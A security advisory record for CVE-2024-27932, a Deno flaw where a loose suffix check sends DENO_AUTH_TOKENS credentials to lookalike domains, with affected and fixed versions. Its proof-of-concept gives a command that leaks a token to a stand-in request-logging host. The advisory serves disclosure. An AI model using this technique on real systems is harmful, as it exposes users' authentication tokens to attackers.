GHSA-5frw-4rwq-xhcr

Source

https://github.com/advisories/GHSA-5frw-4rwq-xhcr

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-5frw-4rwq-xhcr/GHSA-5frw-4rwq-xhcr.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-5frw-4rwq-xhcr

Aliases

CVE-2024-27932

Published

2024-03-06T17:03:36Z

Modified

2024-03-21T18:25:42Z

Severity

4.6 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N CVSS Calculator

Summary

Deno's improper suffix match testing for DENO_AUTH_TOKENS

Details

Summary

Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com.

Details

authtokens.rs uses a simple endswith check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.

PoC

Set up a server that logs requests. RequestBin will do. For example, denovulnpoc.example.com.
Run DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
Observe that the token intended only for the truncated domain is sent to the full domain

Impact

What kind of vulnerability is it? Who is impacted? Anyone who uses DENOAUTHTOKENS and imports potentially untrusted code is affected.

References

Affected packages

crates.io / deno

Package

Name: deno; View open source insights on deps.dev
Purl: pkg:cargo/deno

Affected ranges

Type: SEMVER
Events: Introduced

1.8.0

Fixed

1.40.4